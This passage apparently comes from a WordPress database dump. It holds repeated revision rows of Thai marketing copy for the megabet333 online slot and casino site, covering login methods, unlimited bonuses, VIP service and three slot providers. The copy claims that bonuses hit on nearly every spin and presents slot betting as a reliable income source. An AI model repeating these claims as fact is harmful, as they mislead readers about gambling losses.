</b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"800\" height=\"334\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:40:13','2025-10-23 08:40:13','',44,'https://megabet333.biz/?p=141',0,'revision','',0),(142,3,'2025-10-23 08:40:13','2025-10-23 08:40:13','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"800\" height=\"334\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:40:13','2025-10-23 08:40:13','',44,'https://megabet333.biz/?p=142',0,'revision','',0),(143,3,'2025-10-23 08:40:14','2025-10-23 08:40:14','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"800\" height=\"334\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว 